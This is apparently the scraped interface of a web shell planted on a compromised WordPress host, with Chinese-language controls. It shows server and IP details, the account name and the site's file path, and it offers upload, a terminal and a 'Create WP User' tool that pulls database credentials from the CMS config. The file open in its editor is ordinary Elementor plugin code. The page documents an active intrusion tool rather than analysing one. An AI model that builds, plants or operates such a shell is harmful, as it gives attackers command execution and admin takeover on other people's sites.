Linux webm017.cluster130.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid x86_64
PHP/7.4.33
服务器IP :
10.130.20.17
& 您的IP :
216.73.217.47
域名 :
无法读取 [ /etc/named.conf ]
用户 :
koaigpw
上传
终端
新建文件
新建文件夹
Create WP User
登出
+
/
home
/
koaigpw
/
budomat.net.pl
/
wp-content
/
plugins
/
elementor
/
includes
/
template-library
/
data
/
endpoints
/
[ 返回根目录 ]
名称
大小
权限
修改时间
操作
..
-
-
-
templates.php
2.27 KB
-rw-------
2026-07-03 01:00
>_
终端
关闭 ✕
输入 'help' 查看可用命令。
koaigpw@
>
新建文件
文件名
取消
创建
重命名
新名称
取消
重命名
Create WordPress User
Auto (baca dari file CMS)
Manual (isi kredensial DB)
代码编辑器 :
templates.php
<?php namespace Elementor\Includes\TemplateLibrary\Data\Endpoints; use Elementor\Data\V2\Base\Endpoint; use Elementor\Plugin; use Elementor\TemplateLibrary\Source_Local; if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly. } class Templates extends Endpoint { protected function register() { parent::register(); $document_types = Plugin::$instance->documents->get_document_types( [ 'show_in_library' => true, ] ); $this->register_route( '', \WP_REST_Server::CREATABLE, [ 'is_multi' => true, 'title' => [ 'required' => false, 'type' => 'string', 'description' => 'The title of the document', ], 'type' => [ 'required' => true, 'description' => 'The document type.', 'type' => 'string', 'enum' => array_keys( $document_types ), ], 'content' => [ 'required' => false, 'description' => 'Elementor data object', 'type' => 'object', ], ] ); } public function get_name() { return 'templates'; } public function get_format() { return 'template-library/templates'; } public function get_items( $request ) { return $this->reorder_categories( Plugin::$instance->templates_manager->get_library_data( [ 'filter_sources' => [ $request->get_param( 'source' ) ] ] ) ); } /** * Move the '404 page' category to the end of the list * * @param array $library_data * @return array */ private function reorder_categories( array $library_data ): array { $not_found_category = '404 page'; $key = array_search( $not_found_category, $library_data['config']['block']['categories'] ); if ( false === $key ) { return $library_data; } array_splice( $library_data['config']['block']['categories'], $key, 1 ); $library_data['config']['block']['categories'][] = $not_found_category; return $library_data; } public function create_items( $request ) { /** @var Source_Local $source */ $source = Plugin::$instance->templates_manager->get_source( 'local' ); $result = $source->save_item( [ 'title' => $request->get_param( 'title' ), 'type' => $request->get_param( 'type' ), 'content' => $request->get_param( 'content' ), 'page_settings' => $request->get_param( 'page_settings' ), ] ); if ( is_wp_error( $result ) ) { return $result; } return $source->get_item( $result ); } }
关闭
保存